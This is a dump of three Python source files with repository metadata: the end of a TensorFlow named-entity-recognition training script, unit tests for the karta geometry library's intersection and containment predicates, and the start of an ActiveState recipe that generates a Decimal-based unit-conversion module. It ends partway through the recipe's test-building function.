print 'Epoch {}'.format(epoch)
start = time.time()
###
train_loss, train_acc = model.run_epoch(session, model.X_train,
model.y_train)
val_loss, predictions = model.predict(session, model.X_dev, model.y_dev)
print 'Training loss: {}'.format(train_loss)
print 'Training acc: {}'.format(train_acc)
print 'Validation loss: {}'.format(val_loss)
if val_loss < best_val_loss:
best_val_loss = val_loss
best_val_epoch = epoch
if not os.path.exists("./weights"):
os.makedirs("./weights")
saver.save(session, './weights/ner.weights')
if epoch - best_val_epoch > config.early_stopping:
break
###
confusion = calculate_confusion(config, predictions, model.y_dev)
print_confusion(confusion, model.num_to_tag)
print 'Total time: {}'.format(time.time() - start)
saver.restore(session, './weights/ner.weights')
print 'Test'
print '=-=-='
print 'Writing predictions to q2_test.predicted'
_, predictions = model.predict(session, model.X_test, model.y_test)
save_predictions(predictions, "q2_test.predicted")
if __name__ == "__main__":
test_NER()
| mit | -2,195,417,113,203,144,000 | 37.136919 | 93 | 0.652904 | false |
fortyninemaps/karta | tests/vector_predicate_tests.py | 1 | 11300 | """ Unit tests for vector geometry predicate methods """
from __future__ import division
import unittest
import numpy as np
from karta.vector.geometry import (Point, Line, Polygon,
Multipoint, Multiline, Multipolygon)
from karta.crs import (Cartesian, SphericalEarth, LonLatWGS84)
from karta.errors import CRSError
class TestUnaryPredicates(unittest.TestCase):
def test_poly_clockwise(self):
p = Polygon([(0,0), (0,1), (1,1), (1,0)])
self.assertTrue(p.isclockwise())
return
def test_poly_counterclockwise(self):
p = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertFalse(p.isclockwise())
return
def test_poly_polar(self):
p = Polygon([(0.0, 80.0), (30.0, 80.0), (60.0, 80.0), (90.0, 80.0),
(120.0, 80.0), (150.0, 80.0), (180.0, 80.0),
(-150.0, 80.0), (-120.0, 80.0), (-90.0, 80.0),
(-60.0, 80.0), (-30.0, 80.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(0.0, 85.0, 0.0), (90.0, 85.0, 0.0), (180.0, 85.0, 0.0),
(-90.0, 85.0, 0.0)], crs=SphericalEarth)
self.assertTrue(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=SphericalEarth)
self.assertFalse(p.ispolar())
p = Polygon([(-80, 0), (-50, -10), (20, -8), (35, -17), (55, 15),
(-45, 18), (-60, 12)], crs=LonLatWGS84)
self.assertFalse(p.ispolar())
p = Polygon([(45.0, 30.0), (40.0, 25.0), (45.0, 20.0), (35.0, 25.0)],
crs=Cartesian)
self.assertRaises(CRSError, p.ispolar)
return
class TestBinaryPredicates(unittest.TestCase):
def test_line_intersection(self):
line0 = Line([(0.0, 0.0), (3.0, 3.0)])
line1 = Line([(0.0, 3.0), (3.0, 0.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(1.5, 1.5)]))
return
def test_line_intersection2(self):
# test lines that have overlapping bounding boxes, but don't cross
# -----
# | -----
# | |
# ----- |
# -----
line0 = Line([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
line1 = Line([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertFalse(line0.intersects(line1))
return
def test_poly_intersection(self):
# test polygons formed exactly as in test_line_intersection2, except
# the rings are implicitly closed
# -----
# | --x--
# | . . |
# --x-- |
# -----
poly0 = Polygon([(0.0, 0.0), (3.0, 0.0), (3.0, 3.0), (0.0, 3.0)])
poly1 = Polygon([(1.0, 4.0), (-2.0, 4.0), (-2.0, 1.0), (1.0, 1.0)])
self.assertTrue(poly0.intersects(poly1))
self.assertEqual(poly0.intersections(poly1), Multipoint([(0.0, 1.0), (1.0, 3.0)]))
return
def test_line_intersection_horizontal(self):
line0 = Line([(-2.5, 2.5), (2.5, 2.5)])
line1 = Line([(0.0, 0.0), (1.0, 5.0)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(0.5, 2.5)]))
return
def test_line_intersection_vertical(self):
line0 = Line([(2.5, 2.5), (2.5, -2.5)])
line1 = Line([(1.5, 2.5), (3.5, -2.5)])
self.assertTrue(line0.intersects(line1))
self.assertEqual(line0.intersections(line1), Multipoint([(2.5, 0.0)]))
return
def test_intersection_polygons(self):
poly0 = Polygon([(0, 0), (2, 0), (3, 1), (2, 1), (2, 2), (1, 0)])
poly1 = Polygon([(-1, -1), (1, -1), (1, 1), (-1, 1)])
self.assertTrue(poly0.intersects(poly1))
return
def test_line_intersects_geographical1(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-39.0, 34.0), (-39.0, 37.5)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical2(self):
line1 = Line([(-40.0, 36.0), (-38.0, 36.5)], crs=SphericalEarth)
line2 = Line([(-42.0, 34.0), (-41.0, 37.5)], crs=SphericalEarth)
self.assertFalse(line1.intersects(line2))
return
def test_line_intersects_geographical3(self):
# checks to make sure geodesics are handled
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (1.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical4(self):
# catches possible bugs in handling vertical segments on sweepline
line1 = Line([(-50.0, 70.0), (50.0, 70.0)], crs=SphericalEarth)
line2 = Line([(0.0, 71.0), (0.0, 89.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_line_intersects_geographical4(self):
# checks that coordinates are normalized
line1 = Line([(-10.0, 20.0), (-30.0, 20.0)], crs=SphericalEarth)
line2 = Line([(340.0, 10.0), (340.0, 30.0)], crs=SphericalEarth)
self.assertTrue(line1.intersects(line2))
return
def test_poly_contains1(self):
# trivial cases
pt0 = Point((-0.5, 0.92))
unitsquare = Polygon([(0.0,0.0), (1.0,0.0), (1.0,1.0), (0.0,1.0)])
self.assertFalse(unitsquare.contains(pt0))
pt1 = Point((0.125, 0.875))
self.assertTrue(unitsquare.contains(pt1))
x = np.arange(-4, 5)
y = (x)**2
line = Line([(x_,y_) for x_,y_ in zip(x, y)], crs=Cartesian)
bbox = Polygon([(-2.5, 2.5), (2.5, 2.5), (2.5, -2.5), (-2.5, -2.5)],
crs=Cartesian)
self.assertEqual(list(filter(bbox.contains, line)),
[Point((-1, 1)), Point((0, 0)), Point((1, 1))])
return
def test_poly_contains2(self):
# test some hard cases
diamond = Polygon([(0,0), (1,1), (2,0), (1, -1)])
self.assertFalse(diamond.contains(Point((2, 1))))
self.assertTrue(diamond.contains(Point((1, 0))))
self.assertFalse(diamond.contains(Point((2.5, 0))))
self.assertFalse(diamond.contains(Point((0, -1))))
self.assertFalse(diamond.contains(Point((2, -1))))
return
def test_poly_contains3(self):
# case where point is on an edge (should return true)
square = Polygon([(0,0), (1,0), (1,1), (0,1)])
self.assertTrue(square.contains(Point([0.5, 0])))
self.assertTrue(square.contains(Point([0, 0.5])))
return
def test_poly_contains4(self):
# hippie star
theta = np.linspace(0, 2*np.pi, 361)[:-1]
r = 10*np.sin(theta*8) + 15
x = np.cos(theta) * r + 25
y = np.sin(theta) * r + 25
polygon = Polygon(zip(x, y))
# causes naive cross-product methods to fail
pt = Point((28.75, 25.625))
self.assertTrue(polygon.contains(pt))
return
def test_poly_contains_polar(self):
p = Polygon([(0, 80), (45, 80), (90, 80), (135, 80), (180, 80),
(225, 80), (270, 80), (315, 80)],
crs=SphericalEarth)
self.assertTrue(p.contains(Point((45, 85), crs=SphericalEarth)))
self.assertFalse(p.contains(Point((45, 75), crs=SphericalEarth)))
return
def test_within_distance(self):
line = Line([(0,0), (1,1), (3,1)])
pt = Point((1,1.5))
self.assertTrue(line.within_distance(pt, 0.6))
self.assertFalse(line.within_distance(pt, 0.4))
return
def test_multipoint_within_bbox(self):
vertices = [(float(x),float(y)) for x in range(-10,11)
for y in range(-10,11)]
ans = [v for v in vertices if (-5.0<v[0]<5.0) and (-4.0<v[1]<6.0)]
mp = Multipoint(vertices)
sub = mp.within_bbox((-5.0, -4.0, 5.0, 6.0))
self.assertEqual(sub, Multipoint(ans))
return
def test_multipoint_within_polygon(self):
np.random.seed(42)
x = (np.random.random(100) - 0.5) * 180.0
y = (np.random.random(100) - 0.5) * 30.0
xp = [-80, -50, 20, 35, 55, -45, -60]
yp = [0, -10, -8, -17, 15, 18, 12]
poly = Polygon(zip(xp, yp), crs=LonLatWGS84)
mp = Multipoint(zip(x, y), crs=LonLatWGS84)
subset = mp.within_polygon(poly)
excluded = [pt for pt in mp if pt not in subset]
self.assertTrue(all(poly.contains(pt) for pt in subset))
self.assertFalse(any(poly.contains(pt) for pt in excluded))
return
def test_multiline_touching_line(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
line = Line([(-30, -40), (11, -30), (10, 22), (-10, 50)])
touching = multiline.touching(line)
self.assertEqual(len(touching), 4)
return
def test_multipolygon_touching_line(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[10,0],[10,10],[0,10]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
line = Line([(-40, -35), (-15, -30), (30, 5), (10, 32), (-15, 17)])
touching = multipolygon.touching(line)
self.assertEqual(len(touching), 10)
return
def test_multiline_touching_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multiline.touching(poly)
self.assertEqual(len(touching), 12)
return
def test_multipolygon_touching_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
touching = multipolygon.touching(poly)
self.assertEqual(len(touching), 14)
return
def test_multiline_within_poly(self):
np.random.seed(49)
multiline = Multiline([10*np.random.rand(10, 2)
+ np.random.randint(-50, 50, (1, 2)) for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multiline.within(poly)
self.assertEqual(len(within), 8)
return
def test_multipolygon_within_poly(self):
np.random.seed(49)
multipolygon = \
Multipolygon([[np.array([[0,0],[3,0],[3,3],[0,3]])
+ np.random.randint(-50, 50, (1, 2))]
for _ in range(50)])
poly = Polygon([(-30, -40), (12, -30), (8, 22), (-10, 50)])
within = multipolygon.within(poly)
self.assertEqual(len(within), 8)
return
if __name__ == "__main__":
unittest.main()
| mit | 7,244,258,512,799,947,000 | 38.788732 | 90 | 0.524071 | false |
ActiveState/code | recipes/Python/577652_Unit_Conversions_Using_Decimal/recipe-577652.py | 1 | 19568 | """
This recipe generates a module convert.py and convertTest.txt which is used
to test conversion.py when it is run.
conversion.py is built from the table defining the unit conversions
* uses the decimal module as a base class and unit types are class properties.
* provides exact decimal representation
* control over precision
* control over rounding to meet legal or regulatory requirements
* tracking of significant decimal places
* results match calculations done by hand
conversion.py supplies the following classes:
Distance
Area
Volumn
Time
Velocity
Acceleration
Mass
Force
Weight
Pressure
Frequency
Power
Temperature
"""
from decimal import *
header = """
conversion.py
Unit Conversion
Dave Bailey
4/10/2011
The conversion.py module uses Decimal from the decimal module as the base class
decimal is based on the General Decimal Arithmetic Specification
IEEE standard 854-1987
conversion provides:
exact decimal representation
control over precision,
control over rounding to meet legal or regulatory requirements,
tracking of significant decimal places
results match calculations done by hand.
"""
examples = """
-- Examples:
>>> d = Distance(0.0)
>>> d.mi = 1.0
>>> print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5280.000000000000000000000000, Decimal('5280.000000000000000000000000')
>>> getcontext().prec = 28
>>> d = Distance(0.0)
>>> d.mi = 1.0
>>> print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5280.000000000000000000000000, Decimal('5280.000000000000000000000000')
>>> getcontext().prec = 52
>>> d = Distance(0.0)
>>> d.mi = 1.0
>>> print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5279.999999999999999999999999588007935999999954845670, Decimal('5279.999999999999999999999999588007935999999954845670')
>>> getcontext().prec = 28
>>> with localcontext() as ctx:
... getcontext().prec = 52
... d = Distance(0.0)
... d.mi = 1.0
... print 'ft -> mile %.3f, %f, %s, %r' % (d.ft,d.ft,d.ft,d.ft)
ft -> mile 5280.000, 5280.000000, 5279.999999999999999999999999588007935999999954845670, Decimal('5279.999999999999999999999999588007935999999954845670')
>>> getcontext().prec
28
>>> d.ft
Decimal('5280.000000000000000000000000')
>>> d0 = Distance('.10')
>>> d = Distance(d0+d0+d0-Decimal('.30'))
>>> '%r' % d.m
"Decimal('0.00')"
>>> d = Distance(.10 + .10 + .10 - .30)
>>> '%r' % d.m
"Decimal('5.5511151231257827021181583404541015625E-17')"
>>> d.m = '1.0'
>>> d.ft
Decimal('3.28083989501312300000')
>>> d.inch
Decimal('39.370078740157476000000')
>>> d.m = 1.0
>>> d.ft
Decimal('3.2808398950131230000')
>>> d.inch
Decimal('39.37007874015747600000')
>>> print d
1 meters (m)
0.000621371 miles (mi)
1.09361 yard (yd)
3.28084 feet (ft)
39.3701 inch (inch)
0.001 kilometers (km)
100 centimeters (cm)
1000 millimeters (mm)
1e+09 nanometer (nm)
>>> d
Decimal('1') meters (m)
Decimal('0.0006213711922373339015151515152') miles (mi)
Decimal('1.093613298337707666666666667') yard (yd)
Decimal('3.2808398950131230000') feet (ft)
Decimal('39.37007874015747600000') inch (inch)
Decimal('0.0010') kilometers (km)
Decimal('1.0E+2') centimeters (cm)
Decimal('1.0E+3') millimeters (mm)
Decimal('1.0E+9') nanometer (nm)
# distance = vt+.5at**2
>>> v = Velocity(49.0332501432)
>>> a = Acceleration(-9.80665002864) # gravity
>>> t = Time(0.0)
>>> print 'initial velocity = %f mps = %f fps' % (v.mps,v.fps)
initial velocity = 49.033250 mps = 160.870243 fps
>>> for sec in range(20):
... t.sec = sec
... d = v*t + Decimal(.5)*a*t**2
... height = Distance(d)
... if height < 0: break
... print 't',t.sec,'height',height.m,'m',height.ft,'ft'
t 0 height 0E-47 m 0E-66 ft
t 1 height 44.12992512888000007365008059 m 144.7832189267716379167004149 ft
t 2 height 78.45320022912000013093347661 m 257.3923892031495785185785154 ft
t 3 height 102.9698253007200001718501880 m 337.8275108291338218056343013 ft
t 4 height 117.6798003436800001964002149 m 386.0885838047243677778677731 ft
t 5 height 122.5831253580000002045835572 m 402.1756081299212164352789303 ft
t 6 height 117.6798003436800001964002149 m 386.0885838047243677778677731 ft
t 7 height 102.9698253007200001718501881 m 337.8275108291338218056343016 ft
t 8 height 78.4532002291200001309334767 m 257.3923892031495785185785157 ft
t 9 height 44.1299251288800000736500806 m 144.7832189267716379167004149 ft
t 10 height 0E-25 m 0E-44 ft
from decimal import *
"""
constants = """
from decimal import *
GRAVITY = Decimal('9.80665002864') # m/s2
FT_IN_MI = Decimal('5280.0')
FT_IN_M = Decimal('3.2808398950131230000')
FT_IN_YD = Decimal('3.0')
INCH_IN_FT = Decimal('12.0')
MI_IN_M = FT_IN_M / FT_IN_MI
YD_IN_M = FT_IN_M / FT_IN_YD
INCH_IN_M = FT_IN_M * INCH_IN_FT
KM_IN_M = Decimal('1.0e-3')
CM_IN_M = Decimal('1.0e2')
MM_IN_M = Decimal('1.0e3')
NM_IN_M = Decimal('1.0e9')
SEC_IN_MIN = Decimal('60.0')
MIN_IN_HR = Decimal('60.0')
DAY_IN_WK = Decimal('7.0')
HR_IN_DAY = Decimal('24.0')
DAY_IN_YR = Decimal('365.24218967')
HR_IN_SEC = Decimal('1.0')/(SEC_IN_MIN * MIN_IN_HR)
G_IN_KG = Decimal('1.0e3')
LB_IN_NEWTON = Decimal('.224808942911188')
OZ_IN_G = Decimal('0.0352739619000')
OZ_IN_LB = Decimal('16.0')
W_IN_HP = Decimal('745.699872')
"""
tables = [
[
["Distance","meters"],
["meters","m","Decimal(self)","self._update(Decimal(value))"],
["miles","mi","Decimal(self) * MI_IN_M","self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)"],
["yard","yd","Decimal(self) * YD_IN_M","self._update(Decimal(value) * Decimal('1.0')/YD_IN_M)"],
["feet","ft","Decimal(self) * FT_IN_M","self._update(Decimal(value) * Decimal('1.0')/FT_IN_M)"],
["inch","inch","Decimal(self) * INCH_IN_M","self._update(Decimal(value) * Decimal('1.0')/INCH_IN_M)"],
["kilometers","km","Decimal(self) * KM_IN_M","self._update(Decimal(value) * Decimal('1.0')/KM_IN_M)"],
["centimeters","cm","Decimal(self) * CM_IN_M","self._update(Decimal(value) * Decimal('1.0')/CM_IN_M)"],
["millimeters","mm","Decimal(self) * MM_IN_M","self._update(Decimal(value) * Decimal('1.0')/MM_IN_M)"],
["nanometer","nm","Decimal(self) * NM_IN_M","self._update(Decimal(value) * Decimal('1.0')/NM_IN_M)"],
],
[
["Area","sq_meters"],
["sq_meters","m2","Decimal(self)","self._update(Decimal(value))"],
["sq_miles","mi2","Decimal(self) * (MI_IN_M * MI_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * MI_IN_M))"],
["sq_yard","yd2","Decimal(self) * (YD_IN_M * YD_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(YD_IN_M * YD_IN_M))"],
["sq_feet","ft2","Decimal(self) * (FT_IN_M * FT_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(FT_IN_M * FT_IN_M))"],
["sq_inch","inch2","Decimal(self) * (INCH_IN_M * INCH_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(INCH_IN_M * INCH_IN_M))"],
["sq_kilometers","km2","Decimal(self) * (KM_IN_M * KM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * KM_IN_M))"],
["sq_centimeters","cm2","Decimal(self) * (CM_IN_M * CM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(CM_IN_M * CM_IN_M))"],
["sq_millimeters","mm2","Decimal(self) * (MM_IN_M * MM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MM_IN_M * MM_IN_M))"],
],
[
["Volumn","cubic_meters"],
["cubic_meters","m3","Decimal(self)","self._update(Decimal(value))"],
["cubic_miles","mi3","Decimal(self) * (MI_IN_M * MI_IN_M * MI_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * MI_IN_M * MI_IN_M))"],
["cubic_yard","yd3","Decimal(self) * (YD_IN_M * YD_IN_M * YD_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(YD_IN_M * YD_IN_M * YD_IN_M))"],
["cubic_feet","ft3","Decimal(self) * (FT_IN_M * FT_IN_M * FT_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(FT_IN_M * FT_IN_M * FT_IN_M))"],
["cubic_inch","inch3","Decimal(self) * (INCH_IN_M * INCH_IN_M * INCH_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(INCH_IN_M * INCH_IN_M * INCH_IN_M))"],
["cubic_kilometers","km3","Decimal(self) * (KM_IN_M * KM_IN_M * KM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * KM_IN_M * KM_IN_M))"],
["cubic_centimeters","cm3","Decimal(self) * (CM_IN_M * CM_IN_M * CM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(CM_IN_M * CM_IN_M * CM_IN_M))"],
["cubic_millimeters","mm3","Decimal(self) * (MM_IN_M * MM_IN_M * MM_IN_M)","self._update(Decimal(value) * Decimal('1.0')/(MM_IN_M * MM_IN_M * MM_IN_M))"],
],
[
["Time","sec"],
["sec","sec","Decimal(self)","self._update(Decimal(value))"],
["min","min","Decimal(self) * Decimal('1.0')/SEC_IN_MIN","self._update(Decimal(value) * SEC_IN_MIN)"],
["hour","hr","Decimal(self) * Decimal('1.0')/(SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (SEC_IN_MIN*MIN_IN_HR))"],
["day","day","Decimal(self) * Decimal('1.0')/(HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR))"],
["week","wk","Decimal(self) * Decimal('1.0')/(DAY_IN_WK*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (DAY_IN_WK*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR))"],
["year","yr","Decimal(self) * Decimal('1.0')/(DAY_IN_YR*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR)","self._update(Decimal(value) * (DAY_IN_YR*HR_IN_DAY*SEC_IN_MIN*MIN_IN_HR))"],
],
[
["Velocity","meters_per_sec"],
["meters_per_sec","mps","Decimal(self)","self._update(Decimal(value))"],
["miles_per_sec","mips","Decimal(self) * MI_IN_M","self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)"],
["miles_per_hr","mph","Decimal(self) * (MI_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["ft_per_sec","fps","Decimal(self) * FT_IN_M","self._update(Decimal(value) * Decimal('1.0')/FT_IN_M)"],
["inch_per_sec","inchps","Decimal(self) * INCH_IN_M","self._update(Decimal(value) * Decimal('1.0')/INCH_IN_M)"],
["km_per_hour","kmph","Decimal(self) * (KM_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["km_per_sec","kmps","Decimal(self) * KM_IN_M","self._update(Decimal(value) * Decimal('1.0')/KM_IN_M)"],
],
[
["Acceleration","meters_per_sq_sec"],
["meters_per_sq_sec","mps2","Decimal(self)","self._update(Decimal(value))"],
["miles_per_sq_sec","mips2","Decimal(self) * MI_IN_M","self._update(Decimal(value) * Decimal('1.0')/MI_IN_M)"],
["miles_per_hr_per_sec","mphps","Decimal(self) * (MI_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(MI_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["ft_per_sq_sec","fps2","Decimal(self) * FT_IN_M","self._update(Decimal(value) * Decimal('1.0')/FT_IN_M)"],
["inch_per_sq_sec","ips2","Decimal(self) * INCH_IN_M","self._update(Decimal(value) * Decimal('1.0')/INCH_IN_M)"],
["km_per_hour_per_sec","kmphps","Decimal(self) * (KM_IN_M * SEC_IN_MIN * MIN_IN_HR)","self._update(Decimal(value) * Decimal('1.0')/(KM_IN_M * SEC_IN_MIN * MIN_IN_HR))"],
["km_per_sq_sec","kmps2","Decimal(self) * KM_IN_M","self._update(Decimal(value) * Decimal('1.0')/KM_IN_M)"],
],
[
["Mass","kilogram"],
["kilogram","kg","Decimal(self)","self._update(Decimal(value))"],
["gram","g","Decimal(self) * Decimal('1000.0')","self._update(Decimal(value) / Decimal('1000.0'))"],
["ounce","oz","Decimal(self) * OZ_IN_G * Decimal('1000.0')","self._update(Decimal(value) / OZ_IN_G / Decimal('1000.0'))"],
["pounds","lbm","Decimal(self) * (OZ_IN_G / OZ_IN_LB) * Decimal('1000.0')","self._update(Decimal(value)* OZ_IN_LB / OZ_IN_G / Decimal('1000.0') )"],
],
[
["Force","newton"], # m*kg*s**2
["newton","N","Decimal(self)","self._update(Decimal(value))"],
["kilogram-force","kgf","Decimal(self) / GRAVITY","self._update(Decimal(value) * GRAVITY)"],
["dyne","dyn","Decimal(self) * Decimal('100000.0')","self._update(Decimal(value) / Decimal('100000.0'))"],
["pound-force","lbf","Decimal(self) * (G_IN_KG * OZ_IN_G) / (OZ_IN_LB*GRAVITY)","self._update(Decimal(value) * (OZ_IN_LB * GRAVITY) / (G_IN_KG * OZ_IN_G))"],
],
[
["Weight","kilogram"], # m*kg*s**2
["kilogram","kg","Decimal(self)","self._update(Decimal(value))"],
["gram","g","Decimal(self) * G_IN_KG ","self._update(Decimal(value) / G_IN_KG)"],
["ounce","oz","Decimal(self) * G_IN_KG * OZ_IN_G ","self._update(Decimal(value) / (G_IN_KG * OZ_IN_G))"],
["pounds","lbm","Decimal(self) * (G_IN_KG * OZ_IN_G) / (OZ_IN_LB)","self._update(Decimal(value) * (OZ_IN_LB ) / (G_IN_KG * OZ_IN_G))"],
],
[
["Pressure","pascal "],
["pascal","Pa","Decimal(self)","self._update(Decimal(value))"],
["newton_per_sq_m","Nm2","Decimal(self)","self._update(Decimal(value))"],
["kilogram_per_sq_m","kgfpm2","Decimal(self) * Decimal('1.0')/GRAVITY","self._update(Decimal(value) * GRAVITY)"],
["pound_per_sq_inch","psi","Decimal(self) * (LB_IN_NEWTON/(INCH_IN_M * INCH_IN_M))","self._update(Decimal(value) * (INCH_IN_M * INCH_IN_M) / LB_IN_NEWTON)"],
["pound_per_sq_ft","psf","Decimal(self) * LB_IN_NEWTON/(FT_IN_M * FT_IN_M)","self._update(Decimal(value) * (FT_IN_M * FT_IN_M) / LB_IN_NEWTON)"],
],
[
["Frequency","Frequency"],
["hertz","Hz","Decimal(self)","self._update(Decimal(value))"],
["KHz","KHz","Decimal(self) * Decimal('1.0')/Decimal(1.0e3)","self._update(Decimal(value) * Decimal('1.0e3'))"],
["MHz","MHz","Decimal(self) * Decimal('1.0')/Decimal(1.0e6)","self._update(Decimal(value) * Decimal('1.0e6'))"],
["GHz","GHz","Decimal(self) * Decimal('1.0')/Decimal(1.0e9)","self._update(Decimal(value) * Decimal('1.0e9'))"],
],
[
["Power","Power"],
["watts","W","Decimal(self)","self._update(Decimal(value))"],
["kilowatt","KW","Decimal(self) * Decimal('1.0')/Decimal('1.0e3')","self._update(Decimal(value) * Decimal('1.0e3'))"],
["megawatt","MW","Decimal(self) * Decimal('1.0')/Decimal('1.0e6')","self._update(Decimal(value) * Decimal('1.0e6'))"],
["Horsepower","hp","Decimal(self) * Decimal('1.0')/W_IN_HP","self._update(Decimal(value) * W_IN_HP)"],
["joulepersec","jps","Decimal(self)","self._update(Decimal(value))"],
],
[
["Temperature","degreeK"],
["Kelvin","K","Decimal(self)","self._update(Decimal(value))"],
["Fahrenheit","F","((Decimal(self) - Decimal('273.15')) * Decimal('9.0')/Decimal('5.0')) + Decimal('32.0')","self._update((Decimal(value) - Decimal('32.0')) * (Decimal('5.0')/Decimal('9.0')) + Decimal('273.15'))"],
["Celsius","C","Decimal(self) - Decimal('273.15')","self._update(Decimal(value) + Decimal('273.15'))"],
],
]
def build_class(table):
"build a class for each table i.e. Distance,Velocity,etc."
name, baseunits = table[0]
s = '\nclass %(name)s(Decimal):\n' % locals()
s += ' __slots__ = ("_update",) # generate AttributeError on illegal property; example: if d.yds instead of d.ydgenerate AttributeError example: if d.yds not d.yd\n'
return s
def build_init(table):
"update method"
s = """
def _update(self,dec):
self._exp = dec._exp
self._sign = dec._sign
self._int = dec._int
self._is_special = dec._is_special
"""
return s
def build_str_funct(table):
"str method"
fmt1 = " def __str__(self):\n s = ''\n"
fmt2 = " s += '%%g %(units)s (%(abrev)s)\\n' %% self.%(abrev)s\n"
name, baseunits = table[0]
s = fmt1 % locals()
for data in table[1:]:
if len(data) == 3:
units, abrev, value = data
else:
units, abrev, value, value2 = data
s += fmt2 % locals()
s += ' return s[:-1]\n'
return s
def build_repr_funct(table):
"repr method"
fmt1 = " def __repr__(self):\n s = ''\n"
fmt2 = " s += '%%r %(units)s (%(abrev)s)\\n' %% self.%(abrev)s\n"
name, baseunits = table[0]
s = fmt1 % locals()
for data in table[1:]:
if len(data) == 3:
units, abrev, value = data
else:
units, abrev, value, value2 = data
s += fmt2 % locals()
s += ' return s[:-1]\n'
return s
def build_methods(table):
"setter and getter property methods"
fmt = """ @property
def %(abrev)s(self):
return eval("%(value)s")
@%(abrev)s.setter
def %(abrev)s(self, value):
eval("%(value2)s")\n"""
s = ''
name, baseunits = table[0]
for data in table[1:]:
if len(data) == 3:
units, abrev, value = data
value2 = str(Decimal(1.0)/eval(value))
else:
units, abrev, value, value2 = data
s += fmt % locals()
return s
def build_header(header,tables,examples):
"build module description"
s = header
s += 'Conversions:\n'
for table in tables:
s += ' %s\n' % table[0][0]
s += examples
s += '\n"""\n'
return s
def build_doctest_call(modulename, testfilename):
"create method to call doctest on module and module test file"
s = """
def test():
"test method tests examples and testfile"
print '\\n**** %s test ****\\n'
import doctest
import %s
doctest.testmod(%s, verbose=True, report=True)
print doctest.master.summarize()
doctest.testfile('%s', verbose=True, report=True)
print doctest.master.summarize()
if __name__ == '__main__':
test()
""" % (modulename,modulename,modulename,testfilename)
return s
def build_module(tables, modulename):
"build module from data table "
s = '"""\n'
s += build_header(header, tables, examples)
s += constants
for table in tables:
s += build_class(table)
s += build_init(table)
s += build_str_funct(table)
s += build_repr_funct(table)
s += build_methods(table)
s += build_doctest_call(modulename, testfilename)
return s
def build_test(table):
"build a test for all getters and setters for each class"
name, baseunits = table[0]
s = '\n%s conversion class\n' % name
s += '>>> from conversion import %s\n' % (name)
s += '>>> %s = %s(0.0)\n' % (name.lower()[0],name)
args = [arg[1] for arg in table[1:]]
for arg in args:
s += '>>> %s.%s = 1.0\n' % (name.lower()[0],arg)
s += '>>> print %s\n' % (name.lower()[0])
x = eval('%s()' % name)
exec('x.%s = 1.0' % arg)
for line in str(x).split('\n'):
s += '%s\n' % line
s += '>>> %s\n' % (name.lower()[0])
x = eval('%s()' % name)
